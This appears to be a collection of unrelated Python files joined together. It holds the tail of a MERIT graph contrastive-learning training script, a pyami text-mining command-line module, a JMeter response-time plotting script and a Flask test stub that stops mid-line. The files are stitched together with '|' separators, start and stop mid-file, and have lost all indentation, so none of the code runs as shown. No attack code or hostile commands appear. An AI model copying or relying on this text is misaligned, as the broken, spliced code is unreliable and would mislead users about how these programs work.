parser.add_argument('--momentum', type=float, default=0.8)
parser.add_argument('--beta', type=float, default=0.6)
parser.add_argument('--alpha', type=float, default=0.05)
parser.add_argument('--drop_edge', type=float, default=0.4)
parser.add_argument('--drop_feat1', type=float, default=0.4)
parser.add_argument('--drop_feat2', type=float, default=0.4)
args = parser.parse_args()
torch.set_num_threads(4)
def evaluation(adj, diff, feat, gnn, idx_train, idx_test, sparse):
clf = LogisticRegression(random_state=0, max_iter=2000)
model = GCNLayer(input_size, gnn_output_size) # 1-layer
model.load_state_dict(gnn.state_dict())
with torch.no_grad():
embeds1 = model(feat, adj, sparse)
embeds2 = model(feat, diff, sparse)
train_embs = embeds1[0, idx_train] + embeds2[0, idx_train]
test_embs = embeds1[0, idx_test] + embeds2[0, idx_test]
train_labels = torch.argmax(labels[0, idx_train], dim=1)
test_labels = torch.argmax(labels[0, idx_test], dim=1)
clf.fit(train_embs, train_labels)
pred_test_labels = clf.predict(test_embs)
return accuracy_score(test_labels, pred_test_labels)
if __name__ == '__main__':
random.seed(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
torch.cuda.manual_seed(args.seed)
device = torch.device(args.device if torch.cuda.is_available() else 'cpu')
n_runs = args.runs
eval_every_epoch = args.eval_every
dataset = args.data
input_size = args.input_dim
gnn_output_size = args.gnn_dim
projection_size = args.proj_dim
projection_hidden_size = args.proj_hid
prediction_size = args.pred_dim
prediction_hidden_size = args.pred_hid
momentum = args.momentum
beta = args.beta
alpha = args.alpha
drop_edge_rate_1 = args.drop_edge
drop_feature_rate_1 = args.drop_feat1
drop_feature_rate_2 = args.drop_feat2
epochs = args.epochs
lr = args.lr
weight_decay = args.weight_decay
sample_size = args.sample_size
batch_size = args.batch_size
patience = args.patience
sparse = args.sparse
# Loading dataset
adj, features, labels, idx_train, idx_val, idx_test = process.load_data(dataset)
idx_train = torch.LongTensor(idx_train)
idx_val = torch.LongTensor(idx_val)
idx_test = torch.LongTensor(idx_test)
if os.path.exists('data/diff_{}_{}.npy'.format(dataset, alpha)):
diff = np.load('data/diff_{}_{}.npy'.format(dataset, alpha), allow_pickle=True)
else:
diff = aug.gdc(adj, alpha=alpha, eps=0.0001)
np.save('data/diff_{}_{}'.format(dataset, alpha), diff)
features, _ = process.preprocess_features(features)
nb_nodes = features.shape[0]
ft_size = features.shape[1]
nb_classes = labels.shape[1]
features = torch.FloatTensor(features[np.newaxis])
labels = torch.FloatTensor(labels[np.newaxis])
norm_adj = process.normalize_adj(adj + sp.eye(adj.shape[0]))
norm_diff = sp.csr_matrix(diff)
if sparse:
eval_adj = process.sparse_mx_to_torch_sparse_tensor(norm_adj)
eval_diff = process.sparse_mx_to_torch_sparse_tensor(norm_diff)
else:
eval_adj = (norm_adj + sp.eye(norm_adj.shape[0])).todense()
eval_diff = (norm_diff + sp.eye(norm_diff.shape[0])).todense()
eval_adj = torch.FloatTensor(eval_adj[np.newaxis])
eval_diff = torch.FloatTensor(eval_diff[np.newaxis])
result_over_runs = []
# Initiate models
model = GCNLayer(input_size, gnn_output_size)
merit = MERIT(gnn=model,
feat_size=input_size,
projection_size=projection_size,
projection_hidden_size=projection_hidden_size,
prediction_size=prediction_size,
prediction_hidden_size=prediction_hidden_size,
moving_average_decay=momentum, beta=beta).to(device)
opt = torch.optim.Adam(merit.parameters(), lr=lr, weight_decay=weight_decay)
results = []
# Training
best = 0
patience_count = 0
for epoch in range(epochs):
for _ in range(batch_size):
idx = np.random.randint(0, adj.shape[-1] - sample_size + 1)
ba = adj[idx: idx + sample_size, idx: idx + sample_size]
bd = diff[idx: idx + sample_size, idx: idx + sample_size]
bd = sp.csr_matrix(np.matrix(bd))
features = features.squeeze(0)
bf = features[idx: idx + sample_size]
aug_adj1 = aug.aug_random_edge(ba, drop_percent=drop_edge_rate_1)
aug_adj2 = bd
aug_features1 = aug.aug_feature_dropout(bf, drop_percent=drop_feature_rate_1)
aug_features2 = aug.aug_feature_dropout(bf, drop_percent=drop_feature_rate_2)
aug_adj1 = process.normalize_adj(aug_adj1 + sp.eye(aug_adj1.shape[0]))
aug_adj2 = process.normalize_adj(aug_adj2 + sp.eye(aug_adj2.shape[0]))
if sparse:
adj_1 = process.sparse_mx_to_torch_sparse_tensor(aug_adj1).to(device)
adj_2 = process.sparse_mx_to_torch_sparse_tensor(aug_adj2).to(device)
else:
aug_adj1 = (aug_adj1 + sp.eye(aug_adj1.shape[0])).todense()
aug_adj2 = (aug_adj2 + sp.eye(aug_adj2.shape[0])).todense()
adj_1 = torch.FloatTensor(aug_adj1[np.newaxis]).to(device)
adj_2 = torch.FloatTensor(aug_adj2[np.newaxis]).to(device)
aug_features1 = aug_features1.to(device)
aug_features2 = aug_features2.to(device)
opt.zero_grad()
loss = merit(adj_1, adj_2, aug_features1, aug_features2, sparse)
loss.backward()
opt.step()
merit.update_ma()
if epoch % eval_every_epoch == 0:
acc = evaluation(eval_adj, eval_diff, features, model, idx_train, idx_test, sparse)
if acc > best:
best = acc
patience_count = 0
else:
patience_count += 1
results.append(acc)
print('\t epoch {:03d} | loss {:.5f} | clf test acc {:.5f}'.format(epoch, loss.item(), acc))
if patience_count >= patience:
print('Early Stopping.')
break
result_over_runs.append(max(results))
print('\t best acc {:.5f}'.format(max(results))) |
import logging
logging.debug("loading pyami.py")
import sys
import os
import re
import glob
import lxml.etree as etree
import pprint
import ast
from collections import Counter
import traceback
from pathlib import Path
#from cmd_runner import CommandRunner
from dict_lib import AmiDictionary
from file_lib import FileLib
from xml_lib import XmlLib
from text_lib import TextUtil, DSLParser
from pdfreader import PdfReader
# from pdfminer import PDFSyntaxError
from symbol import SymbolIni
from util import AmiLogger
from wikimedia import WikidataLookup
class PyAMI:
""" """
OUTFILE = "outfile"
# flags
APPLY = "apply"
ASSERT = "assert"
CHECK_URLS = "check_urls"
DELETE = "delete"
COMBINE = "combine"
CONTAINS = "contains"
DEBUG = "debug"
DICTIONARY = "dictionary"
FILTER = "filter"
GLOB = "glob"
KEEP = "keep"
LOOKUP = "lookup"
PRINT_SYMBOLS = "print_symbols"
PROJ = "proj"
RECURSE = "recurse"
REGEX = "regex"
SECT = "sect"
SPLIT = "split"
SYMBOLS = "symbols"
TEST = "test"
WIKIDATA_SPARQL = "wikidata_sparql"
XPATH = "xpath"
# apply methods 1:1 input-output
PDF2TXT = "pdf2txt"
TXT2SENT = "txt2sent"
XML2TXT = "xml2txt"
# combine methods n:1 input-output
CONCAT_STR = "concat_str"
# split methods 1:n input-output
TXT2PARA = "txt2para"
XML2SECT = "xml2sect"
# symbols to update table
NEW_SYMBOLS = ["proj"]
LOGLEVEL = "loglevel"
logger = logging.getLogger("pyami")
symbol_ini = None
def __init__(self):
self.logger.debug(f"===============Examples=================")
if self.logger.getEffectiveLevel() <= logging.DEBUG:
traceback.print_stack(file=sys.stdout)
self.args = {} # args captured in here as name/value without "-" or "--"
self.apply = []
self.combine = None
self.config = None
self.current_file = None
self.fileset = None
self.file_dict = {} # possibly to be replaced by content_store.file_dict
# self.content_store = ContentStore(self) # will expose content_store.file_dict
self.func_dict = {}
self.result = None
self.set_flags()
self.wikidata_lookup = None
self.hit_counter = None
self.symbol_ini = SymbolIni(self)
self.set_funcs()
self.show_symbols = False
self.ami_dictionary = None
self.ami_logger = None
if self.show_symbols:
pprint.pp(f"SYMBOLS\n {self.symbol_ini.symbols}")
def set_flags(self):
""" """
self.flag_dict = {}
self.flag_dict[self.APPLY] = None
self.flag_dict[self.CHECK_URLS] = None
self.flag_dict[self.COMBINE] = None
self.flag_dict[self.PRINT_SYMBOLS] = None
self.flag_dict[self.RECURSE] = True
def set_funcs(self):
""" """
# 1:1 methods
# tuple of func+file_extnsion
self.func_dict[self.XML2TXT] = (XmlLib.remove_all_tags, ".xml.txt")
self.func_dict[self.PDF2TXT] = (PdfReader.read_and_convert, ".pdf.txt")
self.func_dict[self.TXT2SENT] = (TextUtil.split_into_sentences, ".sen.txt")
# 1:n methods
def create_arg_parser(self):
"""creates adds the arguments for pyami commandline"""
import argparse
parser = argparse.ArgumentParser(description='Search sections with dictionaries and patterns')
apply_choices = [self.PDF2TXT, self.TXT2SENT, self.XML2TXT]
self.logger.debug("ch", apply_choices)
parser.add_argument('--apply', nargs="+",
choices=['pdf2txt','txt2sent','xml2txt'],
help='list of sequential transformations (1:1 map) to apply to pipeline ({self.TXT2SENT} NYI)')
parser.add_argument('--assert', nargs="+",
help='assertions; failure gives error message (prototype)')
parser.add_argument('--delete', nargs="+",
help='delete globbed files. Argument/s <glob> are relative to `proj`')
parser.add_argument('--combine', nargs=1,
help='operation to combine files into final object (e.g. concat text or CSV file')
parser.add_argument('--config', '-c', nargs="*", default="PYAMI",
help='file (e.g. ~/pyami/config.ini) with list of config file(s) or config vars')
parser.add_argument('--debug', nargs="+",
help='debugging commands , symbols, numbers, (not formalised)')
parser.add_argument('--demo', nargs="*",
help='simple demos (NYI). empty gives list. May need downloading corpora')
parser.add_argument('--dict', '-d', nargs="+",
help='dictionaries to ami-search with, _help gives list')
parser.add_argument('--filter', nargs="+",
help='expr to filter with')
parser.add_argument('--glob', '-g', nargs="+",
help='glob files; python syntax (* and ** wildcards supported); '
'include alternatives in {...,...}. ')
# parser.add_argument('--help', '-h', nargs="?",
# help='output help; (NYI) an optional arg gives level')
parser.add_argument('--keep', nargs=1,
help='delete all except globbed files. Single argument <glob> is relative to `proj`')
parser.add_argument('--languages', nargs="+", default=["en"],
help='languages (NYI)')
parser.add_argument('--loglevel', '-l', default="info",
help='log level (NYI)')
parser.add_argument('--maxbars', nargs="?", type=int, default=25,
help='max bars on plot (NYI)')
parser.add_argument('--nosearch', action="store_true",
help='search (NYI)')
parser.add_argument('--outfile', type=str,
help='output file, normally 1. but (NYI) may track multiple input dirs (NYI)')
parser.add_argument('--patt', nargs="+",
help='patterns to search with (NYI); regex may need quoting')
parser.add_argument('--plot', action="store_false",
help='plot params (NYI)')
parser.add_argument('--proj', '-p', nargs="+",
help='projects to search; _help will give list')
parser.add_argument('--sect', '-s', nargs="+", # default=[AmiSection.INTRO, AmiSection.RESULTS],
help='sections to search; _help gives all(?)')
parser.add_argument('--split', nargs="+", choices=['txt2para','xml2sect'], # split fulltext.xml,
help='split fulltext.* into paras, sections')
parser.add_argument('--test', nargs="*",
choices=['file_lib', 'pdf_lib', 'text_lib'], # tests,
help='run tests for modules; no selection runs all')
return parser
def run_commands(self, arglist=None):
"""parses cmdline, runs cmds and outputs symbols
:param arglist: (Default value = None)
"""
self.logger.info(f"********** raw arglist {arglist}")
self.parse_and_run_args(arglist)
if self.flagged(self.PRINT_SYMBOLS):
self.symbol_ini.print_symbols()
def parse_and_run_args(self, arglist):
"""runs cmds and makes substitutions (${...} then runs workflow
:param arglist:
"""
if arglist is None:
arglist = []
parser = self.create_arg_parser()
self.args = self.extract_parsed_arg_tuples(arglist, parser)
self.logger.debug("ARGS: "+str(self.args))
self.substitute_args()
self.logger.debug("ARGS1: "+str(self.args))
self.set_loglevel_from_args()
self.run_workflows()
def substitute_args(self):
""" """
new_items = {}
self.logger.debug(f"SYMBOLS1 {self.symbol_ini.symbols}")
for item in self.args.items():
new_item = self.make_substitutions(item)
self.logger.debug(f"++++++++{item} ==> {new_item}")
new_items[new_item[0]] = new_item[1]
self.args = new_items
self.logger.info(f"******** substituted ARGS {self.args}")
def run_workflows(self):
""" """
# file workflow
self.wikipedia_lookup = WikidataLookup()
self.logger.warning(f"commandline args {self.args}")
if self.PROJ in self.args:
if self.SECT in self.args or self.GLOB in self.args:
self.run_file_workflow()
elif self.TEST in self.args:
self.logger.warning(f"TEST in **args {self.args}")
self.run_arg_tests()
def make_substitutions(self, item):
"""
:param item:
"""
old_val = item[1]
key = item[0]
new_val = None
if old_val is None:
new_val = None
elif isinstance(old_val, list) and len(old_val) ==1: # single string in list
# not sure of list, is often used when only one value
val_item = old_val[0]
new_val = self.symbol_ini.replace_symbols_in_arg(val_item)
elif isinstance(old_val, list):
new_list = []
for val_item in old_val:
self.logger.debug(f"OLD SYM {val_item}")
new_v = self.symbol_ini.replace_symbols_in_arg(val_item)
self.logger.debug(f"NEW SYM {new_v}")
new_list.append(new_v)
self.logger.debug(f"UPDATED LIST ITEMS: {new_list}")
new_val = new_list
elif isinstance(old_val, (int, bool, float, complex)):
new_val = old_val
elif isinstance(old_val, str):
if "${" in old_val:
self.logger.debug(f"Unresolved reference : {old_val}")
new_val = self.symbol_ini.replace_symbols_in_arg(old_val)
else:
new_val = old_val
# new_items[key] = new_val
else:
self.logger.error(f"{old_val} unknown arg type {type(old_val)}")
new_val = old_val
self.add_selected_keys_to_symbols_ini(key, new_val)
return (key, new_val)
def get_symbol(self, symb):
"""gets symbol from pyami symbol table
"""
return self.symbol_ini.symbols.get(symb)
def extract_parsed_arg_tuples(self, arglist, parser):
"""
:param arglist:
:param parser:
"""
parsed_args = parser.parse_args() if not arglist else parser.parse_args(arglist)
self.logger.info(f"PARSED_ARGS {parsed_args}")
args = {}
arg_vars = vars(parsed_args)
new_items = {}
for item in arg_vars.items():
new_item = self.make_substitutions(item)
new_items[new_item[0]] = new_item[1]
return new_items
def add_selected_keys_to_symbols_ini(self, key, value):
"""
:param key:
:param value:
"""
if key in self.NEW_SYMBOLS:
self.symbol_ini.symbols[key] = value
def set_loglevel_from_args(self):
""" """
levels = {
"debug" : logging.DEBUG,
"info" : logging.INFO,
"warning": logging.WARNING,
"error": logging.ERROR,
}
if self.LOGLEVEL in self.args:
loglevel = self.args[self.LOGLEVEL]
self.logger.info(f"loglevel {loglevel}")
if loglevel is not None:
loglevel = str(loglevel)
if loglevel is not None and loglevel.lower() in levels:
level = levels[loglevel.lower()]
self.logger.setLevel(level)
def run_file_workflow(self):
""" """
# import glob
# import pathlib
# import file_lib
# self.logger.info("globbing")
self.logger.debug(f"ARGS {self.args}")
if not self.args:
self.logger.error("no args given; try --proj or --test")
return
if self.args[self.DEBUG]:
self.run_debug()
if self.args[self.PROJ]:
self.hit_counter = Counter()
self.run_proj()
self.logger.debug(f"hit counter: {self.hit_counter}")
if self.args[self.TEST]:
self.run_arg_tests()
# else:
# self.logger.error("{self.args} requires --proj or --test")
return
def run_debug(self):
for arg in self.args[self.DEBUG]:
if arg == self.SYMBOLS:
self.symbol_ini.print_symbols()
else:
self.logger.warning(f"unknown arg {arg} in debug: ")
def run_proj(self):
self.proj = self.args[self.PROJ]
if self.args[self.DELETE]:
self.delete_files()
if self.args[self.KEEP]: # NYI
self.keep_files()
if self.args[self.GLOB]:
self.glob_files()
if self.args[self.SPLIT]:
self.split(self.args.get(self.SPLIT))
if self.args[self.APPLY]:
self.apply_func(self.args.get(self.APPLY))
if self.args[self.FILTER]:
self.filter_file()
if self.args[self.COMBINE]:
self.combine_files_to_object()
if self.args[self.OUTFILE]:
self.write_output()
if self.args[self.ASSERT]:
self.run_assertions()
def run_arg_tests(self):
self.logger.warning(f"*****running tests : {self.args[self.TEST]}")
_TESTS = ["file_lib", "pdf_lib", "text_lib"]
if not self.args[self.TEST]:
self.logger.warning(f"No tests given: choose some/all of {_TESTS}")
return
if "file_lib" in self.args[self.TEST]:
import test_file
self.logger.warning("run test_file")
test_file.main()
if "pdf_lib" in self.args[self.TEST]:
import test_pdf
self.logger.warning("run test_pdf")
test_pdf.test_read_pdf()
if "text_lib" in self.args[self.TEST]:
# import test_text
self.logger.warning("run test_text NYI")
# test_text.main()
def delete_files(self):
if self.proj is None or self.proj == "":
self.ami_logger.error(f"delete requires --proj; ignored")
return
globs = self.args[self.DELETE]
for glob in globs:
self.delete_glob(glob)
def delete_glob(self, glob_exp):
if ".." in glob_exp or glob_exp.endswith("*"):
self.logger.error(f"glob {glob_exp} cannot contain .. or end in *")
return
full_glob = self.proj + "/" + glob_exp
self.logger.warning(f"delete: {full_glob}")
glob_recurse = True # change this later
globs = glob.glob(full_glob, recursive=glob_recurse)
if globs is not None:
files = {file: None for file in globs}
self.logger.warning(f"deleting {len(files)} files ")
for f in files:
p = Path(f)
if p.is_dir():
self.logger.warning(f"Cannot yet delete directories {p}")
else:
p.unlink()
def glob_files(self):
import glob
glob_recurse = self.flagged(self.RECURSE)
glob_ = self.args[self.GLOB]
self.logger.info(f"glob: {glob_}")
files = {file: None for file in glob.glob(glob_, recursive=glob_recurse)}
self.file_dict = files
# self.content_store.create_file_dict(files)
self.logger.info(f"glob file count {len(self.file_dict)}")
def split(self, type):
""" split fulltext.xml into sections"""
# file_keys = self.content_store.get_file_keys()
file_keys = self.file_dict.keys()
for file in file_keys:
suffix = FileLib.get_suffix(file)
if ".xml" == suffix or type==self.XML2SECT:
self.make_xml_sections(file)
elif ".txt" == suffix or type == self.TXT2PARA:
self.make_text_sections(file)
else:
self.logger.warning(f"no match for suffix: {suffix}")
def make_xml_sections(self, file):
xml_libx = XmlLib();
xml_libx.logger.setLevel(logging.DEBUG)
doc = xml_libx.read(file)
xml_libx.make_sections("sections")
def make_text_sections(self, file):
sections = []
with open(file, "r", encoding="utf-8") as f:
text = f.read()
sections = TextUtil.split_at_empty_newline(text)
self.store_or_write_data(file, sections, )
# self.content_store.store(file, sections)
# for sect in sections:
# self.ami_logger.warning(f"{sect})
def apply_func(self, apply_type):
""" """
self.read_file_content()
if apply_type :
self.logger.info(f"apply {apply_type}")
func_tuple = self.func_dict[apply_type]
if (func_tuple is None):
self.logger.error(f"Cannot find func for {apply_type}")
else:
# apply data is stored in self.file_dict
self.apply_to_file_content(func_tuple, apply_type)
return
def normalize(self, unistr):
import unicodedata
self.logger.error("NYI")
unicodedata.normalize('NFKC', unistr)
pass
def filter_file(self):
filter_expr = self.args[self.FILTER]
self.logger.warning(f"filter: {filter_expr}")
files = set()
# record hits
file_keys = self.file_dict.keys()
for file in file_keys:
filter_true = self.apply_filter(file, filter_expr)
if filter_true:
files.add(file)
# delete hits from dict
for file in files:
if file in self.file_dict:
del self.file_dict[file]
def apply_filter(self, file, filter_expr):
found = False
if not filter_expr:
self.logger.error(f"No filter expression")
return found
with open(file, "r", encoding="utf-8") as f:
content = f.read()
hits = []
if isinstance(filter_expr, list):
# and'ed at present
for f_expr in filter_expr:
hits = self.apply_filter_expr(content, file, f_expr, hits)
else:
hits = self.apply_filter_expr(content, file, filter_expr, hits)
return hits
def apply_filter_expr(self, content, file, filter_expr, hit_list):
""" applies filters to hit list, usually AND"""
self.logger.debug(f"filter_expr {filter_expr}")
filter_expr = filter_expr.strip()
filter_value = self.extract_command_value(filter_expr)
if filter_value is None:
self.logger.error(f"bad filter_expr {filter_expr}")
return hit_list
filter = filter_value[0]
value = filter_value[1]
value = self.symbol_ini.replace_symbols_in_arg(value)
if value is None:
self.logger.warning(f"null value in filter {filter}")
return None
if False:
pass
elif filter == self.CONTAINS and file.endswith(".txt"):
if value in content:
hit_list.append(value)
elif filter == self.DICTIONARY and file.endswith(".xml"):
hits = self.apply_dictionary(hit_list, value)
if len(hits) > 0:
self.logger.debug(f"xpath {type(hits)} {hits}")
hit_list.extend(hits)
elif filter == self.LOOKUP:
self.logger.debug(f"LOOKUP VALUE {value}")
hits = self.apply_lookup(hit_list, value)
if hits:
hit_list = hits
elif filter == self.REGEX:
hits = self.apply_regex(hit_list, value)
if hits:
self.logger.debug(f"regex hits {hits}")
hit_list = hits
elif filter == self.WIKIDATA_SPARQL:
hits = self.apply_wikidata_sparql(hit_list, value)
if hits:
self.ami_logger.warning(f"wikidata_sparql hits {hits}")
hit_list = hits
elif filter == self.XPATH and file.endswith(".xml"):
tree = etree.parse(file)
hits = [h.strip() for h in tree.xpath(value)]
if len(hits) > 0:
self.ami_logger.warning(f"xpath {type(hits)} {hits}")
hit_list.extend(hits)
self.logger.debug(f"hit list {hit_list}")
if hit_list:
self.ami_logger.info(f"non-zero list {hit_list}")
return hit_list
@classmethod
def extract_command_value(cls, command_expr):
"""split command(value) into tuple
value may have nested commands.
:returns: tuple of command, value
"""
if command_expr is None:
return None
bits = command_expr.split("(", 1)
cls.logger.debug(f"BITS {bits}")
return (bits[0], bits[1][:-1]) if len(bits) > 1 and bits[1].endswith(")") else None
def apply_dictionary(self, hits, name):
dictionary_file = self.get_symbol(name)
if dictionary_file is None:
dictionary_file = name
self.ami_dictionary = AmiDictionary.read_dictionary(file=dictionary_file)
new_hits = []
if self.ami_dictionary is not None:
for hit in hits:
entry = self.ami_dictionary.get_entry(hit.lower())
if entry is not None:
new_hits.append(hit)
self.hit_counter[hit] += 1
# return [hit for hit in hits if re.match(regex, hit)]
return new_hits
def apply_regex(self, hits, regex):
return [hit for hit in hits if re.match(regex, hit)]
# def get_search_string(self, filter_expr, search_method):
# return filter_expr[len(search_method) + 1:-1]
#
def read_file_content(self, to_str=True):
"""read file content as bytes into file_dict
:to_str: if true convert content to strings
:param to_str: (Default value = True)
"""
self.ami_logger = AmiLogger(self.logger, initial=10, routine = 100)
for file in self.file_dict:
self.ami_logger.info(f"reading {file}")
if file.endswith(".xml"):
self.read_string_content_to_dict(file, to_str)
elif file.endswith(".pdf"):
self.save_file_name_to_dict(file)
elif file.endswith(".png"):
self.read_binary_content_to_dict(file)
elif file.endswith(".txt"):
self.read_string_content_to_dict(file, to_str=False)
else:
self.logger.warning(f"cannot read file into string {file}")
def apply_lookup(self, hits, value):
self.logger.debug(f"LOOKUP: {hits} {value}")
for hit in hits:
if False:
pass
elif self.get_dictionary(value) is not None:
dictionary = self.get_dictionary(value)
self.logger.warning("USE DICTIONARY: NYI", value, dictionary)
elif value == 'wikidata':
qnumber = self.wikipedia_lookup.lookup_wikidata(hit)
self.ami_logger.info(f"qnumber {qnumber}")
else:
self.logger.error(f"cannot parse lookup: {value}")
def apply_wikidata_sparql(self, hit_list, value):
if hit_list:
self.ami_logger.warning(f"wikidata input {hit_list}")
return hit_list
def get_dictionary(self, value):
dictionary = None
command_value = self.extract_command_value(value)
if command_value is not None and command_value[0] == "dictionary":
dictionary = command_value[1]
def read_string_content_to_dict(self, file, to_str):
"""reads file into string
Can process bytes to string
DO WE NEED TO STORE THIS?
"""
data = None
self.ami_logger.info(f"reading string content from {file}")
with open(file, "r", encoding="utf-8") as f:
try:
data = f.read()
if to_str and isinstance(data, bytes):
data = data.decode("utf-8")
self.store_or_write_data(file, data)
# self.file_dict[file] = data
except UnicodeDecodeError as ude:
self.logger.error(f"skipped decoding error {ude}")
return data
def save_file_name_to_dict(self, file):
self.store_or_write_data(file, file)
# self.file_dict[file] = file
def read_binary_content_to_dict(self, file):
with open(file, "rb", ) as f:
try:
data = f.read()
self.store_or_write_data(file, data)
# self.file_dict[file] = data
except Exception as e:
self.logger.error(f"skipped reading error {e}")
def apply_to_file_content(self, func_tuple, apply_type):
"""applies func to all string content in file_dict
:param func:
"""
for file in self.file_dict.keys():
data = self.file_dict.get(file)
self.logger.debug(f"file: {file} => {func_tuple[0]}")
new_file = self.create_file_name(file, func_tuple[1])
try:
new_data = func_tuple[0](data)
self.store_or_write_data(file, new_data, new_file)
except Exception as pdferr:
print(f"cannot read PDF {file} because {pdferr} (probably not a PDF), skipped")
return
# needs fixing
def create_file_name(self, file, extension):
pathname = Path(file)
return str(pathname.with_suffix(extension))
def store_or_write_data(self, file, data, new_file=None) -> None:
"""store or write data to disk"""
if file in self.file_dict:
old_data = self.file_dict[file]
if old_data is not None and old_data != data:
self.ami_logger.warning(f"===============================\n"
f"=========OVERWRITING data for {file}\n"
f"{self.file_dict[file]} \n========WITH======\n"
f"{data}")
if new_file is not None:
self.ami_logger.warning(f"WROTE: {new_file}")
with open(new_file, "w", encoding="utf-8") as f:
f.write(data)
self.file_dict[file] = new_file
# save data old-style
self.file_dict[file] = data
def combine_files_to_object(self):
""" """
methods = self.args.get(self.COMBINE)
if methods and methods == self.CONCAT_STR:
self.result = "\n".join(self.file_dict.values())
self.ami_logger.warning(f"combine {self.result}")
def write_output(self):
""" """
self.outfile = self.args[self.OUTFILE]
if self.result: # single output
self.write_single_result()
if self.file_dict:
self.write_multiple_results()
def write_multiple_results(self):
for file in self.file_dict:
data = self.file_dict[file]
parent = FileLib.get_parent_dir(file)
new_outfile = os.path.join(parent, self.outfile)
# if not isinstance(data, list):
# # data = [data]
# pass # this was a mistake
with open(new_outfile, "w", encoding="utf-8") as f:
self.ami_logger.warning(f"wrote results {new_outfile}")
# for d in data:
f.write(f"{str(data)}")
def write_single_result(self):
FileLib.force_write(self.outfile, self.result, overwrite=True)
self.logger.warning(f"wrote results {self.outfile}")
def run_assertions(self):
""" """
assertions = self.args.get(self.ASSERT)
if assertions is not None:
self.parser = DSLParser()
if isinstance(assertions, str):
assertions = [assertions]
for assertion in assertions:
self.parser.parse_and_run(assertion)
def flagged(self, flag):
"""is flag set in flag_dict
if flag is in flag_dict and not falsy return true
:flag:
:param flag:
"""
return True if self.flag_dict.get(flag) else False
# def run_examples(self):
# # from examples import Examples
# examples = Examples()
#
# examples.example_pdf2txt()
# examples.example_split_pdf_txt_paras()
#
# examples.example_xml2sect()
# examples.example_split_oil26()
#
# examples.example_split_sentences()
# examples.example_xml2sect()
# examples.example_filter()
# examples.example_filter_species()
#
# pass
class ContentStore():
"""caches content or writes it to disk
replaces earlier pyami.file_dict
"""
def __init__(self, pyami):
self.pyami = pyami
self.file_dict = {}
def main():
""" main entry point for cmdline
"""
run_dsl = False
examples = True
run_commands = False
PyAMI.logger.warning(f"\n============== running pyami main ===============\n{sys.argv[1:]}")
pyami = PyAMI()
# this needs commandline
if run_commands:
pyami.run_commands()
# pyami.run_tests()
if run_dsl:
DSLParser.run_tests(sys.argv[1:])
# if examples:
# pyami.run_examples()
else:
pyami.run_commands(sys.argv[1:])
if __name__ == "__main__":
PyAMI.logger.warning(f"sys.argv: {sys.argv}")
# DONT rune main
main()
else:
PyAMI.logger.debug(" NOT running search main anyway")
|
#!/usr/bin/env python
# copied from http://www.metaltoad.com/blog/plotting-your-load-test-jmeter
from pylab import *
import numpy as na
import matplotlib.font_manager
import csv
import sys
elapsed = {}
timestamps = {}
starttimes = {}
errors = {}
# Parse the CSV files
for file in sys.argv[1:]:
threads = int(file.split('-')[0])
for row in csv.DictReader(open(file)):
if (not row['label'] in elapsed):
elapsed[row['label']] = {}
timestamps[row['label']] = {}
starttimes[row['label']] = {}
errors[row['label']] = {}
if (not threads in elapsed[row['label']]):
elapsed[row['label']][threads] = []
timestamps[row['label']][threads] = []
starttimes[row['label']][threads] = []
errors[row['label']][threads] = []
elapsed[row['label']][threads].append(int(row['elapsed']))
timestamps[row['label']][threads].append(int(row['timeStamp']))
starttimes[row['label']][threads].append(int(row['timeStamp']) - int(row['elapsed']))
if (row['success'] != 'true'):
errors[row['label']][threads].append(int(row['elapsed']))
# Draw a separate figure for each label found in the results.
for label in elapsed:
# Transform the lists for plotting
plot_data = []
throughput_data = [None]
error_x = []
error_y = []
plot_labels = []
column = 1
for thread_count in sort(elapsed[label].keys()):
plot_data.append(elapsed[label][thread_count])
plot_labels.append(thread_count)
test_start = min(starttimes[label][thread_count])
test_end = max(timestamps[label][thread_count])
test_length = (test_end - test_start) / 1000
num_requests = len(timestamps[label][thread_count]) - len(errors[label][thread_count])
if (test_length > 0):
throughput_data.append(num_requests / float(test_length))
else:
throughput_data.append(0)
for error in errors[label][thread_count]:
error_x.append(column)
error_y.append(error)
column += 1
# Start a new figure
fig = figure(figsize=(9, 6))
# Pick some colors
palegreen = matplotlib.colors.colorConverter.to_rgb('#8CFF6F')
paleblue = matplotlib.colors.colorConverter.to_rgb('#708DFF')
# Plot response time
ax1 = fig.add_subplot(111)
ax1.set_yscale('log')
bp = boxplot(plot_data, notch=0, sym='+', vert=1, whis=1.5)
# Tweak colors on the boxplot
plt.setp(bp['boxes'], color='g')
plt.setp(bp['whiskers'], color='g')
plt.setp(bp['medians'], color='black')
plt.setp(bp['fliers'], color=palegreen, marker='+')
# Now fill the boxes with desired colors
numBoxes = len(plot_data)
medians = range(numBoxes)
for i in range(numBoxes):
box = bp['boxes'][i]
boxX = []
boxY = []
for j in range(5):
boxX.append(box.get_xdata()[j])
boxY.append(box.get_ydata()[j])
boxCoords = zip(boxX,boxY)
boxPolygon = Polygon(boxCoords, facecolor=palegreen)
ax1.add_patch(boxPolygon)
# Plot the errors
if (len(error_x) > 0):
ax1.scatter(error_x, error_y, color='r', marker='x', zorder=3)
# Plot throughput
ax2 = ax1.twinx()
ax2.plot(throughput_data, 'o-', color=paleblue, linewidth=2, markersize=8)
# Label the axis
ax1.set_title(label)
ax1.set_xlabel('Number of concurrent requests')
ax2.set_ylabel('Requests per second')
ax1.set_ylabel('Milliseconds')
ax1.set_xticks(range(1, len(plot_labels) + 1, 2))
ax1.set_xticklabels(plot_labels[0::2])
fig.subplots_adjust(top=0.9, bottom=0.15, right=0.85, left=0.15)
# Turn off scientific notation for Y axis
ax1.yaxis.set_major_formatter(ScalarFormatter(False))
# Set the lower y limit to the match the first column
ax1.set_ylim(ymin=bp['boxes'][0].get_ydata()[0])
# Draw some tick lines
ax1.yaxis.grid(True, linestyle='-', which='major', color='grey')
ax1.yaxis.grid(True, linestyle='-', which='minor', color='lightgrey')
# Hide these grid behind plot objects
ax1.set_axisbelow(True)
# Add a legend
line1 = Line2D([], [], marker='s', color=palegreen, markersize=10, linewidth=0)
line2 = Line2D([], [], marker='o', color=paleblue, markersize=8, linewidth=2)
line3 = Line2D([], [], marker='x', color='r', linewidth=0, markeredgewidth=2)
prop = matplotlib.font_manager.FontProperties(size='small')
figlegend((line1, line2, line3), ('Response Time', 'Throughput', 'Failures (50x)'),
'lower center', prop=prop, ncol=3)
# Write the PNG file
savefig(label)
|
import store
import unittest
from flask import json
class StoreTestCase(unittest.TestCase):
def setUp(self):
# TODO: setup fixture data, test revision bumps
store.app.config['TESTING'] = True
self.c = store.app.test_client()
self.headers = {
